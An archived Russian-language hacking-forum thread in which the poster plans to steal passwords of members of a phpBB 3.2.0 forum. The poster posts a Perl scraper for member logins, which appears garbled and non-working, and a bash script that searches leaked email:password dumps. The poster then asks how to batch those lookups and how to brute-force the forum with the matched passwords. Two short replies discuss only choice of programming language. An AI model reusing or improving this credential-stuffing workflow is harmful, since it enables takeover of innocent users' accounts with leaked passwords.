ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
07.10.2018, 15:36
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
Столкнулся со следующей задачей: Цель PhpBB 3.2.0 (Регистрация на форуме не работает, и основная задача у меня, "захватить" как можно больше паролей зарегистрированных участников)
1). Вопрос №1. Необходимо спарсить логины всех участников форума. Найденное решение:
.SpoilerTarget" type="button">Spoiler
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl
[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#0000BB"]qq[/COLOR][COLOR="#007700"](
[/COLOR][COLOR="#0000BB"]Enter adress[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"]. -[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.site.ru/
[/COLOR][COLOR="#007700"]> );
[/COLOR][COLOR="#0000BB"]$adr[/COLOR][COLOR="#007700"]=;
[/COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$adr[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]qq[/COLOR][COLOR="#007700"](
[/COLOR][COLOR="#0000BB"]Enter numbers of page witch users[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"]. -[/COLOR][COLOR="#0000BB"]500
[/COLOR][COLOR="#007700"]> );
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=;
[/COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]A[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]">>nicknames.txt"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]( ) or die;
[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$client[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]nicknames[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=~ /(.*)/g;
print A join "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]", @nicknames;}[/COLOR][/COLOR]
Только зараза не работает. Где тут ошибка-то?
2). Вопрос №2. Выбрать из отпарсенных логинов те, которые имеют вид e-mail адреса. Такие на форуме есть. (Ну с этим проблем возникнуть не должно. Готового софта для этой цели предостаточно).
3). Вопрос №3. Скачав различные базы вида e-mail-pass, сделать отбор известных паролей, для отпарсенных логинов. Решение вот такое:
.SpoilerTarget" type="button">Spoiler
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash
[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"]=$([/COLOR][COLOR="#0000BB"]cd[/COLOR][COLOR="#DD0000"]"$( dirname "[/COLOR][COLOR="#007700"]${[/COLOR][COLOR="#0000BB"]BASH_SOURCE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]" )"[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]pwd[/COLOR][COLOR="#007700"])
if [[/COLOR][COLOR="#DD0000"]"$1"[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
letter1[/COLOR][COLOR="#007700"]=$(echo ${[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],,}|[/COLOR][COLOR="#0000BB"]cut[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b1[/COLOR][COLOR="#007700"])
if [[[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#007700"]== [[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]zA[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Z0[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]] ]];[/COLOR][COLOR="#0000BB"]then
[/COLOR][COLOR="#007700"]if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#007700"]else
[/COLOR][COLOR="#0000BB"]letter2[/COLOR][COLOR="#007700"]=$(echo ${[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],,}|[/COLOR][COLOR="#0000BB"]cut[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b2[/COLOR][COLOR="#007700"])
if [[[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#007700"]== [[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]zA[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Z0[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]] ]];[/COLOR][COLOR="#0000BB"]then
[/COLOR][COLOR="#007700"]if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#007700"]else
[/COLOR][COLOR="#0000BB"]letter3[/COLOR][COLOR="#007700"]=$(echo ${[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],,}|[/COLOR][COLOR="#0000BB"]cut[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b3[/COLOR][COLOR="#007700"])
if [[[/COLOR][COLOR="#0000BB"]$letter3[/COLOR][COLOR="#007700"]== [[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]zA[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Z0[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]] ]];[/COLOR][COLOR="#0000BB"]then
[/COLOR][COLOR="#007700"]if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter3[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter3[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#007700"]else
if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]/symbols"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$letter2[/COLOR][COLOR="#DD0000"]/symbols"
[/COLOR][COLOR="#0000BB"]fi
fi
fi
[/COLOR][COLOR="#007700"]else
if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/symbols"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/[/COLOR][COLOR="#0000BB"]$letter1[/COLOR][COLOR="#DD0000"]/symbols"
[/COLOR][COLOR="#0000BB"]fi
fi
fi
[/COLOR][COLOR="#007700"]else
if [ -[/COLOR][COLOR="#0000BB"]f[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/symbols"[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then
grep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ai[/COLOR][COLOR="#DD0000"]"^$1" "[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/data/symbols"
[/COLOR][COLOR="#0000BB"]fi
fi
[/COLOR][COLOR="#007700"]else
echo[/COLOR][COLOR="#DD0000"]"[*] Example: ./query name@domain.com"
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][/COLOR]
Скрипт хорошо работает. По запросу ./query name@domain.com - выводится нужная инфа по этому мылу, если она есть. Однако мне требуется: одной командой вывести в текстовый файл, всю инфу про всех нужных мне e-mail.Как подправить скрипт?
4) Вопрос №4: По нужным логинам и выбранных для каждого логина пароля(лей), сделать брут форума. Что посоветуйте? |
|
|
08.10.2018, 00:00
|
|
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615
Репутация:
21
|
|
для подобных задач обычно просто пишу скрипт на питоне, т.к. это возможно займёт времени меньше чем поиск готовых аналогов
|
|
|
|
08.10.2018, 02:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
47768
Репутация:
119
|
|
Бро, проснись. Сейчас 2018 год, ктож на перле то пишет? Используй язык GO, и будет свет.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
